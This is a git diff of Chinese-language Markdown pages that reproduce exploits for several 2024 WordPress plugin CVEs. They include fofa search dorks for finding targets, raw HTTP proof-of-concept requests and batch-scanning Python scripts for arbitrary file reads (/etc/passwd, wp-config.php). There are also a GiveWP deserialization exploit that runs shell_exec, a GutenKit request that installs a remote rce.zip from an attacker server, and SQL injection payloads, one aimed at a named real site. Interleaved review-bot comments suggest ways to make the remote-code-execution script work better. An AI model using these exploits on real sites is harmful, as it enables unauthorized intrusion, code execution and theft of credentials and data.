zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Connection: keep-alive +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1733332897353-929b7478-0833-4bbc-bc98-db28b9d1bca9.png) + diff --git a/WordPress插件FileUpload任意文件读取漏洞复现(CVE-2024-9047).md b/WordPress插件FileUpload任意文件读取漏洞复现(CVE-2024-9047).md new file mode 100644 index 0000000..5d6998e --- /dev/null +++ b/WordPress插件FileUpload任意文件读取漏洞复现(CVE-2024-9047).md 
@@ -0,0 +1,116 @@ +# WordPress插件FileUpload任意文件读取漏洞复现(CVE-2024-9047) + +WordPress File Upload插件是一款功能强大的WordPress站点文件上传插件,在 <= 4.24.11 版本前的 wfu_file_downloader.php 文件存在前台任意文件读取+任意文件删除漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。 + +## fofa +```javascript +"wp-content/plugins/wp-file-upload" +``` + +## poc +```python +import requests +import urllib3 +from urllib.parse import urljoin +import argparse +import ssl +import time +import re + +ssl._create_default_https_context = ssl._create_unverified_context +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +def read_file(file_path): + with open(file_path, 'r') as file: + urls = file.read().splitlines() + return urls + +def extract_version(version_text): + match = re.search(r'<strong>Version\s+([0-9]+\.[0-9]+\.[0-9]+)</strong>', version_text) + if match: + version = match.group(1).strip() + print(f"Found version: {version}") + return version + return None + +def version_to_tuple(version): + return tuple(map(int, version.split('.'))) + +def compare_versions(current_version, target_version='4.24.11'): + if current_version: + current_tuple = version_to_tuple(current_version) + target_tuple = version_to_tuple(target_version) + + if current_tuple <= target_tuple: + print(f"\033[32mVersion {current_version} <= {target_version} - 可能存在漏洞\033[0m") + return True + else: + print(f"Version {current_version} > {target_version} - 无漏洞.") + return False + return False + +def check(url): + protocols = ['http://', 'https://'] + found_vulnerabilities = False + + for protocol in protocols: + target_url = urljoin(protocol + url.lstrip('http://').lstrip('https://'), "/") + print(f"Checking {target_url}wp-content") + + timestamp = str(int(time.time())) + + target_url = urljoin(target_url, 
"/wp-content/plugins/wp-file-upload/wfu_file_downloader.php?file=pQ1DyzbQp5hBxQpW&ticket=Hw8h7dBmxROx27ZZ&handler=dboption&session_legacy=1&dboption_base=cookies&dboption_useold=0&wfu_cookie=wp_wpfileupload_939a4dc9e3d96a97c2dd1bdcbeab52ce") + target_url_version = urljoin(target_url, "/wp-content/plugins/wp-file-upload/release_notes.txt") + + headers = { + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", + "Cookie": f"wp_wpfileupload_939a4dc9e3d96a97c2dd1bdcbeab52ce=cfyMMnYQqNBbcBNMLTCDnE7ezEAdzLC3; wfu_storage_pQ1DyzbQp5hBxQpW=/../../../../../etc/passwd[[name]]; wfu_download_ticket_Hw8h7dBmxROx27ZZ={timestamp}; wfu_ABSPATH=/;" + } + headers_version = { + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" + } + + try: + response_version = requests.get(target_url_version, verify=False, headers=headers_version, timeout=10) + + if response_version.status_code == 200: + version_text = response_version.text + version = extract_version(version_text) + + if compare_versions(version): + response = requests.get(target_url, verify=False, headers=headers, timeout=10) + if response.status_code == 200 and all(key in response.text for key in ('/bin/bash', 'root:x:0:0')): + print(f"\033[31mFind: {url}: WordPress_FileUpload (CVE-2024-9047) - ReadAnyFile!\033[0m") + found_vulnerabilities = True + else: + print(f"版本不匹配跳过检查{url}.") + else: + print(f"找不到版本号 {url}.") + + except Exception as e: + print(f"Error while checking {url}: {e}") + +if __name__ == "__main__": + parser = argparse.ArgumentParser(description="WordPress 任意文件读取漏洞检测") + parser.add_argument("-u", "--url", help="单个url检测") + parser.add_argument("-f", "--txt", help="批量检测") + args = parser.parse_args() + + url = args.url + txt = args.txt + + if url: + check(url) + elif txt: + urls = read_file(txt) + for url in urls: + check(url) + else: + print("help") +``` + 
+![image-20241227214033657](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272140753.png) + +## 漏洞来源 + +- https://github.com/iSee857/CVE-2024-9047-PoC/blob/main/WordPress_FileUpload(CVE-2024-9047)_ReadAnyFile.py \ No newline at end of file diff --git a/WordPress插件GiveWP存在反序列漏洞(CVE-2024-5932).md b/WordPress插件GiveWP存在反序列漏洞(CVE-2024-5932).md new file mode 100644 index 0000000..06f613e --- /dev/null +++ b/WordPress插件GiveWP存在反序列漏洞(CVE-2024-5932).md 
@@ -0,0 +1,287 @@ +# WordPress插件GiveWP存在反序列漏洞(CVE-2024-5932) + +WordPress中的GiveWP捐款插件和募捐平台插件存在PHP对象注入漏洞,该漏洞存在于所有版本,包括最高版本3.14.1在内。漏洞源于对来自“give_title”参数的不可信输入进行反序列化操作。这使得未经身份验证的攻击者能够注入PHP对象。此外,如果存在POP链,攻击者可以远程执行代码并删除任意文件。 + +## poc + +### 生成pop链 poc.php + +```php +<?php +namespace Stripe{ + class StripeObject + { + protected $_values; + public function __construct(){ + $this->_values['foo'] = new \Give\PaymentGateways\DataTransferObjects\GiveInsertPaymentData(); + } + } +} + +namespace Give\PaymentGateways\DataTransferObjects{ + class GiveInsertPaymentData{ + public $userInfo; + public function __construct() + { + $this->userInfo['address'] = new \Give(); + } + } +} + +namespace{ + class Give{ + protected $container; + public function __construct() + { + $this->container = new \Give\Vendors\Faker\ValidGenerator(); + } + } +} + +namespace Give\Vendors\Faker{ + class ValidGenerator{ + protected $validator; + protected $generator; + public function __construct() + { + $this->validator = "shell_exec"; + $this->generator = new \Give\Onboarding\SettingsRepository(); + } + } +} + +namespace Give\Onboarding{ + class SettingsRepository{ + protected $settings; + public function __construct() + { + $this -> settings['address1'] = 'touch /tmp/EQSTtest'; + } + } +} + +namespace{ + $a = new Stripe\StripeObject(); + echo serialize($a); +} +``` + +### 漏洞复现 + +**获取give_form_id** + +```php +POST /wp-admin/admin-ajax.php HTTP/1.1 +Host: 192.168.178.100:9000 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 23 +Connection: keep-alive +sec-ch-ua-platform: "Windows" +sec-ch-ua: "Google Chrome";v="101", "Chromium";v="101", "Not=A?Brand";v="24" +sec-ch-ua-mobile: ?0 + 
+action=give_form_search +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409050947910.png) + +**获取 give-form-hash** + +``` +POST /wp-admin/admin-ajax.php HTTP/1.1 +Host: 192.168.178.100:9000 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 47 +Connection: keep-alive +sec-ch-ua-platform: "Windows" +sec-ch-ua: "Google Chrome";v="101", "Chromium";v="101", "Not=A?Brand";v="24" +sec-ch-ua-mobile: ?0 + +action=give_donation_form_nonce&give_form_id=11 +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409050948442.png) + + + +**give_title 填入poc.php生成的序列化数据** + +```php +POST /wp-admin/admin-ajax.php HTTP/1.1 +Host: 192.168.178.100:9000 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 653 +Connection: keep-alive +sec-ch-ua-platform: "Windows" +sec-ch-ua: "Google Chrome";v="101", "Chromium";v="101", "Not=A?Brand";v="24" +sec-ch-ua-mobile: ?0 + +action=give_process_donation&give-form-hash=cc27fec673&give-form-id=11&give_email=1@random.com&give_first=a&give-amount=10&give-gateway=manual&give_stripe_payment_method=&give_last=b&give_title=to_be_unserialized +``` + + + +### 利用脚本 + +```python +import requests +from bs4 import BeautifulSoup +from faker import Faker +from urllib.parse import urlparse +import random +import hashlib +import time +import sys +import re +import rich_click as click + 
+requests.packages.urllib3.disable_warnings( + requests.packages.urllib3.exceptions.InsecureRequestWarning +) + +banner = r""" +Analysis base : https://www.wordfence.com/blog/2024/08/4998-bounty-awarded-and-100000-wordpress-sites-protected-against-unauthenticated-remote-code-execution-vulnerability-patched-in-givewp-wordpress-plugin/ + +============================================================================================================= + +CVE-2024-5932 : GiveWP unauthenticated PHP Object Injection +description: The GiveWP Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the 'give_title' parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to execute code remotely, and to delete arbitrary files. +Arbitrary File Deletion + +============================================================================================================= + """ + +class GiveWPExploit: + + def __init__(self, url: str, file: str): + self.url = url + self.file = file + + def greeting() -> None: + print(banner) + + def spinner(duration=10, interval=0.1) -> None: + spinner_chars = ['|', '/', '-', '\\'] + end_time = time.time() + duration + while time.time() < end_time: + for char in spinner_chars: + sys.stdout.write(f'\r[{char}] Exploit loading, please wait...') + sys.stdout.flush() + time.sleep(interval) + print("") + + def getBaseUrl(self, url): + parsed_url = urlparse(url) + base_url = f"{parsed_url.scheme}://{parsed_url.netloc}" + return base_url + + def getParams(self) -> dict: + response = requests.get(self.url) + soup = BeautifulSoup(response.text, 'html.parser') + + give_form_id = soup.find('input', {'name': 'give-form-id'})['value'] + give_form_hash = soup.find('input', {'name': 'give-form-hash'})['value'] + button_tag = soup.find('button', 
{'data-price-id': True}) + give_price_id = button_tag['data-price-id'] + give_amount = button_tag.get_text(strip=True) + + # Fake Userinfo + fake = Faker() + + params = {"give-form-id" : give_form_id, + "give-form-hash" : give_form_hash, + "give-price-id" : give_price_id, + "give-amount" : give_amount, + "give_first": fake.first_name(), + "give_last": fake.last_name(), + "give_email": fake.email(),} + + return params + + def getData(self) -> dict: + file = self.file + rand_md5 = hashlib.md5(str(random.randint(0, 10)).encode()).hexdigest() + # Payload + payload = 'O:19:"Stripe\\\\\\\\StripeObject":1:{s:10:"\\0*\\0_values";a:1:{s:3:"foo";O:62:"Give\\\\\\\\PaymentGateways\\\\\\\\DataTransferObjects\\\\\\\\GiveInsertPaymentData":1:{s:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:12:"\\0*\\0container";O:33:"Give\\\\\\\\Vendors\\\\\\\\Faker\\\\\\\\ValidGenerator":3:{s:12:"\\0*\\0validator";s:10:"shell_exec";s:12:"\\0*\\0generator";O:34:"Give\\\\\\\\Onboarding\\\\\\\\SettingsRepository":1:{s:11:"\\0*\\0settings";a:1:{s:8:"address1";s:%d:"%s";}}s:13:"\\0*\\0maxRetries";i:10;}}}}}}' % (len(file), file) + data = self.getParams() + data['give_title'] = payload + data['give-gateway'] = 'offline' + data['action'] = 'give_process_donation' + print(f"[+] Requested Data: ") + print(data) + return data + + def isEmbed(self, url: str) -> str: + pattern = r'<iframe[\s\S]*?\bname="give-embed-form"[\s\S]*?>' + response = requests.get(url) + match = re.search(pattern, response.text) + if match: + soup1 = BeautifulSoup(response.text, 'html.parser') + embed_url = soup1.find('iframe')['src'] + return embed_url + else: + return url + + def sendRequest(self) -> None: + # Fake User_Agent + fake = Faker() + baseUrl = self.getBaseUrl(self.url) + reqUrl = f"{baseUrl}/wp-admin/admin-ajax.php" + data = self.getData() + headers = { + 'User-Agent': fake.user_agent(), + 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', + 'Accept-Encoding': 'gzip, deflate, br' + } + response = 
requests.post(reqUrl, data=data, headers=headers) + + def exploit(self) -> None: + self.url = self.isEmbed(self.url) + self.sendRequest() + +# argument parsing with rich_click +@click.command() +@click.option( + "-u", + "--url", + required=True, + help="Specify a URL or domain for vulnerability detection (Donation-Form Page)", +) +@click.option( + "-c", + "--cmd", + default="/tmp/test", + help="Specify the file to read from the server", +) + +def main(url: str, cmd: str) -> None: + cve_exploit = GiveWPExploit(url, cmd) + GiveWPExploit.greeting() + GiveWPExploit.spinner(duration=1) + cve_exploit.exploit() + +if __name__ == "__main__": + main() +``` + + + +## 漏洞来源 + +- https://github.com/EQSTLab/CVE-2024-5932 +- https://www.rcesecurity.com/2024/08/wordpress-givewp-pop-to-rce-cve-2024-5932/ \ No newline at end of file diff --git a/WordPress插件GutenKit存在任意文件上传漏洞(CVE-2024-9234).md b/WordPress插件GutenKit存在任意文件上传漏洞(CVE-2024-9234).md new file mode 100644 index 0000000..2c8031c --- /dev/null +++ b/WordPress插件GutenKit存在任意文件上传漏洞(CVE-2024-9234).md 
@@ -0,0 +1,35 @@ +# WordPress插件GutenKit存在任意文件上传漏洞(CVE-2024-9234) + +GutenKit - 用于 WordPress 的古腾堡块编辑器插件的页面构建器块、模式和模板容易受到任意文件上传的攻击,因为在所有版本中缺少对 install_and_activate_plugin_from_external() 函数(install-active-plugin REST API 端点)的功能检查至(并包括)2.1.0。这使得未经身份验证的攻击者可以安装和激活任意插件,或利用该功能上传像插件一样欺骗的任意文件。 + +## fofa + +```java +body="wp-content/plugins/gutenkit-blocks-addon" +``` + +## poc + +```javascript +POST /wp-json/gutenkit/v1/install-active-plugin HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br, zstd +Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded + +plugin=http://vps-ip/rce.zip +``` + +![image-20241018155657418](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410181556493.png) + +文件路径`/wp-content/plugins/rce.php` + + + +## 漏洞来源 + +- https://nvd.nist.gov/vuln/detail/CVE-2024-9234 +- [Wordpress GutenKit 插件 远程文件写入致RCE漏洞复现(CVE-2024-9234)_漏洞复现-CSDN专栏](https://download.csdn.net/blog/column/10118303/142984860) \ No newline at end of file diff --git a/WordPress插件Icegram-Express存在未经身份验证的SQL注入漏洞(CVE-2024-4295).md b/WordPress插件Icegram-Express存在未经身份验证的SQL注入漏洞(CVE-2024-4295).md new file mode 100644 index 0000000..ac34521 --- /dev/null +++ b/WordPress插件Icegram-Express存在未经身份验证的SQL注入漏洞(CVE-2024-4295).md 
@@ -0,0 +1,96 @@ +# WordPress插件Icegram-Express存在未经身份验证的SQL注入漏洞(CVE-2024-4295) + +WordPress 的 Icegram Express 插件的电子邮件订阅者在 5.7.20 及之前的所有版本中都容易通过“hash”参数受到 SQL 注入攻击,原因是对用户提供的参数转义不充分,并且对现有 SQL 缺乏充分的准备询问。 这使得未经身份验证的攻击者可以将额外的 SQL 查询附加到现有的查询中,这些查询可用于从数据库中提取敏感信息。 + +## fofa + +```javascript +body="/wp-content/plugins/email-subscribers/" +``` + +## poc + +```javascript +POST /wp-admin/admin-post.php HTTP/1.1 +Host: +Content-Type: application/x-www-form-urlencoded + +page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111 +``` + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502131420209.webp) + +```javascript +id: CVE-2024-4295 + +info: + name: Email Subscribers by Icegram Express <= 5.7.20 - Unauthenticated SQL Injection via Hash + author: iamnoooob,rootxharsh,pdresearch + severity: critical + description: | + Email Subscribers by Icegram Express <= 5.7.20 contains an unauthenticated SQL injection vulnerability via the hash parameter. + remediation: Fixed in 5.7.21 + impact: This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. 
+ reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/641123af-1ec6-4549-a58c-0a08b4678f45?source=cve + - https://github.com/cve-2024/CVE-2024-4295-Poc + - https://github.com/truonghuuphuc/CVE-2024-4295-Poc + - https://nvd.nist.gov/vuln/detail/CVE-2024-4295 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-4295 + cwe-id: CWE-89 + epss-score: 0.00091 + epss-percentile: 0.39447 + cpe: cpe:2.3:a:icegram:email_subscribers_\&_newsletters:*:*:*:*:*:wordpress:*:* + metadata: + vendor: icegram + product: email_subscribers_\&_newsletters + framework: wordpress + verified: true + max-request: 1 + publicwww-query: "/wp-content/plugins/email-subscribers/" + fofa-query: body="/wp-content/plugins/email-subscribers/" + tags: time-based-sqli,cve,cve2024,wordpress,wp-plugin,wp,email-subscribers,sqli + +flow: http(1) && http(2) + +variables: + contact_id: "{{contact_id}}" + email: "{{email}}" + rawhash: '{"message_id":0,"campaign_id":0,"contact_id":"{{contact_id}}","email":"{{email}}","guid":"dibwol-qaiebd-qvrgkp-lhyopm-rmyfzo","list_ids":["sleep(8)"],"action":"subscribe"}' + +http: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/wp-content/plugins/email-subscribers/readme.txt" + + stop-at-first-match: true + host-redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'contains_any(body, "email-subscribers-", "Email Subscribers by Icegram Express")' + internal: true + + - raw: + - | + @timeout: 20s + GET /?es=optin&hash={{ base64(rawhash) }} HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'duration>=8' + - 'contains(body, "You have been successfully subscribed")' + condition: and +``` + +## 漏洞来源 + +- https://github.com/projectdiscovery/nuclei-templates/blob/d7a064daf93a42628df88d043b737c7297143645/http/cves/2024/CVE-2024-4295.yaml +- https://mp.weixin.qq.com/s/Shni_iBVEDEP2q-Ng0qcNw \ No newline at end of file 
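Review bot: In the CVE-2024-5932 GiveWP script, the `-c/--cmd` option is documented as "Specify the file to read from the server" (default `/tmp/test`) and the banner advertises "Arbitrary File Deletion", but `getData()` builds the POP chain with `s:10:"shell_exec"` as the `ValidGenerator` validator, so whatever is passed in is executed as a shell command; make the option name, help text, default and banner say so, and drop the unused `rand_md5`. Two smaller logic problems: `isEmbed()` locates the `name="give-embed-form"` iframe with the regex but then returns `soup1.find('iframe')['src']`, i.e. the first iframe on the page, which may be an unrelated embed; and `sendRequest()` discards `response`, so the script never reports whether the donation request was accepted (check the status code and JSON body and print them). `getParams()` and `isEmbed()` also call `requests.get()` with default certificate verification even though InsecureRequestWarning is silenced, so self-signed targets fail with an SSLError; pass `verify=False` consistently or remove the suppression.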
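Review bot: The CVE-2024-9234 GutenKit entry states the result lands at `/wp-content/plugins/rce.php`, but `install-active-plugin` installs a plugin archive, so that path only holds if `rce.zip` carries `rce.php` at its root; describe the expected zip layout and the response that confirms installation, because `plugin=http://vps-ip/rce.zip` on its own gives the reader nothing to verify against. Style: the fofa block is fenced as `java` and the HTTP request as `javascript`, while sibling entries use one tag for both; pick one (`http` reads best for raw requests) and keep it consistent.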
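Review bot: The CVE-2024-4295 Icegram entry mixes two vectors. The description and the nuclei template target the `hash` parameter of `/?es=optin` (a base64 JSON blob whose `list_ids` carries `sleep(8)`), but the hand-written PoC posts `advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+` to `admin-post.php`, a different parameter and endpoint that is not what CVE-2024-4295 describes; label it as a separate issue or drop it. In the template, `contact_id: "{{contact_id}}"` and `email: "{{email}}"` resolve to themselves unless supplied with `-var`, so the page should say those two values are required input. The Chinese description also renders "prepared statements" as "准备询问", which hides the root cause; "SQL 语句未使用预处理" is the intended meaning.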
diff --git a/WordPress插件Tainacan存在前台任意文件读取漏洞(CVE-2024-7135).md b/WordPress插件Tainacan存在前台任意文件读取漏洞(CVE-2024-7135).md new file mode 100644 index 0000000..52b0c50 --- /dev/null +++ b/WordPress插件Tainacan存在前台任意文件读取漏洞(CVE-2024-7135).md @@ -0,0 +1,28 @@ +# WordPress插件Tainacan存在前台任意文件读取漏洞(CVE-2024-7135) + +由于 0.21.7 之前(包括 0.21.7)的所有版本中缺少对“get_file”功能的功能检查,因此适用于 WordPress 的 Tainacan 插件容易受到未经授权的数据访问。该函数还容易受到目录遍历的攻击。这使得经过身份验证的攻击者(具有订阅者级别和更高级别访问权限)能够读取服务器上的任意文件的内容,这些文件可能包含敏感信息。 + +## fofa + +```javascript +"wp-content/plugins/tainacan/" +``` + +## poc + +首先要注册一个普通用户并登录,然后获取一下网站首页的Nonce,之后就可以直接读取了 + +```javascript +GET /wp-json/tainacan/v2/bg-processes/file?guid=../../../wp-config.php&_wpnonce=替换目标网站nonce HTTP/1.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br, zstd +Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 +Cache-Control: no-cache +Connection: keep-alive +Cookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=57p45m6lctlfttfrsjfpk4fui9; wp_lang=zh_CN; wordpress_logged_in_5c016e8f0f95f039102cbe8366c5c7f3=admin%7C1729391061%7ColYyhIIyEr3yA8JstL99jsKU6rCXsMPR8tQH6nNauzP%7C59e8715eb35b44ed9532e025052b7ef1748b384a9e03a39a9538cd4cd18ffdbe; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml%26mfold%3Do; wp-settings-time-1=1729218262 +Host: 127.0.0.1 +``` + +![46a373971b5c0c4c637b280c889d2f91](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410181624561.png) + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410181624425.webp) \ No newline at end of file diff --git a/WordPress插件Tutor_LMS存在SQL注入漏洞复现(CVE-2024-10400).md b/WordPress插件Tutor_LMS存在SQL注入漏洞复现(CVE-2024-10400).md new file mode 100644 index 0000000..db037ad --- /dev/null +++ b/WordPress插件Tutor_LMS存在SQL注入漏洞复现(CVE-2024-10400).md 
@@ -0,0 +1,98 @@ +# WordPress插件Tutor_LMS存在SQL注入漏洞复现(CVE-2024-10400) + +WordPress 的 Tutor LMS 插件在 2.7.6 及 2.7.6 之前的所有版本中存在通过 “rating_filter ”参数进行 SQL 注入的漏洞,原因是用户提供的参数未进行充分的转义处理,而且现有的 SQL 查询也未进行预编译。这使得未经认证的攻击者有可能在已有的查询中附加额外的 SQL 查询,从而从数据库中提取敏感信息。 + +## fofa +```javascript +body="/wp-content/plugins/tutor/" +``` + +## poc +```javascript +POST /wp-admin/admin-ajax.php HTTP/1.1 +Host: academy.keune.ch +Content-Type: application/x-www-form-urlencoded + +action=load_filtered_instructor&_tutor_nonce=56803fc221&rating_filter=1e0+and+1=0+Union+select+1,2,3,4,5,6,7,8,9,concat(0x7e,user(),0x7e),11,12,14--+- +``` + +访问网站查看源码,获取_tutor_nonce的参数 + +![image-20241227220244898](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272202950.png) + +![image-20241227220301165](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272203238.png) + +## python脚本 + +```python +import requests +import urllib3 +from urllib.parse import urljoin +import argparse +import ssl +import re + +ssl._create_default_https_context = ssl._create_unverified_context +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +def read_file(file_path): + with open(file_path, 'r') as file: + return file.read().splitlines() + +def check_sql_injection(url): + target_url = url.rstrip("/") + target_url_tutor_nonce = urljoin(target_url, "") + print(target_url_tutor_nonce) + target_endpoint = urljoin(target_url, "/wp-admin/admin-ajax.php") + + headers = { + "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15", + "Content-Type": "application/x-www-form-urlencoded" + } + + tutor_nonce = None + + try: + response = requests.get(target_url_tutor_nonce, verify=False, headers=headers, timeout=15) + + match = re.search(r'"_tutor_nonce":"(\w+)"', response.text) + if match: + tutor_nonce = match.group(1) + print(f"\033[32mFound_tutor_nonce: {tutor_nonce}\033[0m") + + if tutor_nonce: + payloads = 
f"action=load_filtered_instructor&_tutor_nonce={tutor_nonce}&rating_filter=1e0+and+1=0+Union+select+111,2222,3333,4,5,6,7,8,9,concat(md5(123321),version()),11,12,14--+-" + + + response = requests.post(target_endpoint, verify=False, headers=headers, timeout=15, data=payloads) + if response.status_code == 200 and all(key in response.text for key in ['c8837b23ff8aaa8a2dde915473ce099110']): + print(f"\033[31mFind: {url}: WordPress_CVE-2024-10400_sql_Injection!\033[0m") + return True + + except requests.RequestException as e: + print(f"Error checking {url}: {e}") + + return False + +def main(): + parser = argparse.ArgumentParser(description="Check for SQL injection vulnerabilities.") + group = parser.add_mutually_exclusive_group(required=True) + group.add_argument("-u", "--url", help="Target URL") + group.add_argument("-f", "--file", help="File containing URLs") + + args = parser.parse_args() + + if args.url: + check_sql_injection(args.url) + elif args.file: + urls = read_file(args.file) + for url in urls: + check_sql_injection(url) + +if __name__ == "__main__": + main() +``` + +## 漏洞来源 + +- https://github.com/iSee857/CVE-PoC/blob/d6dc0f2baa9e65ae8d277f9e67086dc2f4bd72ac/WordPress_CVE-2024-10400_sql_Injection.py#L42 \ No newline at end of file diff --git a/WordPress插件WP-Guru存在任意文件读取漏洞(CVE-2024-12849).md b/WordPress插件WP-Guru存在任意文件读取漏洞(CVE-2024-12849).md new file mode 100644 index 0000000..34fc4bb --- /dev/null +++ b/WordPress插件WP-Guru存在任意文件读取漏洞(CVE-2024-12849).md 
@@ -0,0 +1,71 @@ +# WordPress插件WP-Guru存在任意文件读取漏洞(CVE-2024-12849) + +WordPress 的 WP Guru 错误日志查看器插件在 1.0.1.3 及之前的所有版本中都容易受到通过 wp_ajax_nopriv_elvwp_log_download AJAX 操作进行任意文件读取的攻击。这使得未经身份验证的攻击者可以读取服务器上任意文件的内容,其中可能包含敏感信息。 + +## poc + +```yaml +id: CVE-2024-12849 + +info: + name: Error Log Viewer By WP Guru <= 1.0.1.3 - Missing Authorization to Arbitrary File Read + author: s4e-io + severity: high + description: | + The Error Log Viewer By WP Guru plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 1.0.1.3 via the wp_ajax_nopriv_elvwp_log_download AJAX action. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information. + reference: + - https://github.com/RandomRobbieBF/CVE-2024-12849 + - https://www.wordfence.com/threat-intel/vulnerabilities/id/57888e36-3a61-4452-b4ea-9db9e422dc2d?source=cve + - https://nvd.nist.gov/vuln/detail/CVE-2024-12849 + - https://www.cve.org/CVERecord?id=CVE-2024-12849 + - https://github.com/advisories/GHSA-899p-f2mf-g895 + - https://www.tenable.com/cve/CVE-2024-12849 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-12849 + cwe-id: CWE-22 + metadata: + verified: true + max-request: 2 + vendor: wp-guru + product: error-log-viewer-wp + framework: wordpress + shodan-query: http.html:"wp-content/plugins/error-log-viewer-wp" + fofa-query: body="wp-content/plugins/error-log-viewer-wp" + tags: cve,cve2024,wordpress,wp-plugin,error-log-viewer-wp,lfi + +flow: http(1) && http(2) + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + matchers: + - type: dsl + dsl: + - 'contains(body, "/wp-content/plugins/error-log-viewer-wp")' + internal: true + + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + 
action=elvwp_log_download&elvwp_error_log_download=1&elvwp_error_log=/etc/passwd + matchers: + - type: dsl + dsl: + - "regex('root:.*:0:0:', body)" + - 'contains(content_type, "application/octet-stream")' + - "status_code == 200" + condition: and +``` + + + +## 漏洞来源 + +- https://github.com/projectdiscovery/nuclei-templates/pull/11456/files \ No newline at end of file diff --git a/WordPress插件Wux-Blog-Editor存在越权漏洞(CVE-2024-9932).md b/WordPress插件Wux-Blog-Editor存在越权漏洞(CVE-2024-9932).md new file mode 100644 index 0000000..9a93a3d --- /dev/null +++ b/WordPress插件Wux-Blog-Editor存在越权漏洞(CVE-2024-9932).md @@ -0,0 +1,24 @@ +# WordPress插件Wux-Blog-Editor存在前台越权漏洞( CVE-2024-9932) + +**Wux-Blog-Editor 是在一个地方编辑来自所有不同WordPress网站的帖子和页面的插件,位于 /wp-content/plugins/wux-blog-editor/External_Post_Editor.php 中的 wuxbt_externalAutologin 方法存在前台越权漏洞,只需要传入Referer 为 https://blog.tool.wux.nl/ 即可直接登录管理员账号.** + +## poc +```javascript +GET /wp-json/external-post-editor/v2/autologin 